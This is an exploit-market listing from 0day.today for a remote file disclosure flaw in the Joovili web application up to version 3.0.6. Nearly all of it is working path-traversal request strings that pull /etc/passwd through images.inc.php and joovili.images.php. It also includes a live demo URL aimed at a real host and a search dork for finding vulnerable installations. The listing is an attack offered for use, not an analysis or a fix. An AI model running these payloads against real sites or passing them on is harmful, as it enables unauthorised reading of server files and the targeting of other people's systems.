[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability

Author
EcHoLL
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2413
Category
web applications
Date add
27-12-2007
Platform
unsorted
==========================================================================
Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability
==========================================================================



found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE
 
 
demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili



#  0day.today [2024-12-26]  #